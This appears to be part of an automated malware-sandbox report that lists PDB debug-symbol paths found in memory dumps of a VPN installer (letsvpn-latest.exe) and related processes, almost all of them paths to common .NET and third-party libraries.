              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: letsvpn-latest.exe, 00000015.00000003.2384419249.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2420810198.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: letsvpn-latest.exe, 00000015.00000003.2409981035.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2384419249.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: letsvpn-latest.exe, 00000015.00000003.2511086814.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: letsvpn-latest.exe, 00000015.00000003.2372959947.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.Cci.Pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: letsvpn-latest.exe, 00000015.00000003.2433680162.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: letsvpn-latest.exe, 00000015.00000003.2489791226.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452861918.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: letsvpn-latest.exe, 00000015.00000003.2497068507.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2381608570.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: letsvpn-latest.exe, 00000015.00000003.2346711845.000000000310D000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003A.00000000.2692956022.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003A.00000002.2702950830.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003C.00000000.2777222933.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003C.00000002.2785001894.000000000069D000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: letsvpn-latest.exe, 00000015.00000003.2415443172.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: letsvpn-latest.exe, 00000015.00000003.2492960900.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2365247282.0000000003100000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707740926.0000000002B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: letsvpn-latest.exe, 00000015.00000003.2375723278.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: letsvpn-latest.exe, 00000015.00000003.2469202106.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: letsvpn-latest.exe, 00000015.00000003.2425036584.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000015.00000003.2501476791.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000015.00000003.2437674075.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000015.00000003.2476535630.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000015.00000003.2386682491.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3444226642.00000000590F2000.00000002.00000001.01000000.0000002F.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2479924642.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000015.00000003.2508023924.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000015.00000003.2388904149.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2463035170.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2468439882.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000015.00000003.2483409746.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, 00000013.00000002.3394803400.000000006E531000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000015.00000003.2420810198.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000015.00000003.2469936140.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000015.00000003.2464968959.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2461540941.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2459017919.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2466277974.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000015.00000003.2450779209.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000015.00000003.2408687064.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000015.00000003.2548790969.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000015.00000003.2366742475.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2479247746.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000015.00000003.2484061202.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000015.00000003.2414685482.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2459711071.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000015.00000003.2430770460.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2507336044.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000015.00000003.2480592822.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2436998881.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000015.00000003.2349256901.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000015.00000003.2394947957.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2493596023.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdbR source: letsvpn-latest.exe, 00000015.00000003.2393796689.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000015.00000003.2438332844.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2508751976.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Thread\4.0.2.0\System.Threading.Thread.pdb source: letsvpn-latest.exe, 00000015.00000003.2496112419.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdb source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdb source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdb source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdb source: letsvpn-latest.exe, 00000015.00000003.2448378119.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding\4.0.11.0\System.Text.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2490972504.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Claims\4.0.3.0\System.Security.Claims.pdb source: letsvpn-latest.exe, 00000015.00000003.2475844449.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.SqlClient/net461-Windows_NT-Release/System.Data.SqlClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2407414987.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\mdb\obj\Release\net40\Mono.Cecil.Mdb.pdb source: letsvpn-latest.exe, 00000015.00000003.2376938176.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdb source: letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensions\obj\Release\SQLiteNetExtensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2383107440.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netfx\System.ValueTuple.pdb source: letsvpn-latest.exe, 00000015.00000003.2503243921.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Primitives\4.0.3.0\System.IO.FileSystem.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2428597566.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdbp( source: letsvpn-latest.exe, 00000015.00000003.2411480070.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdb source: letsvpn-latest.exe, 00000015.00000003.2367415267.0000000003105000.00000004.00000020.00020000.00000000.sdmp
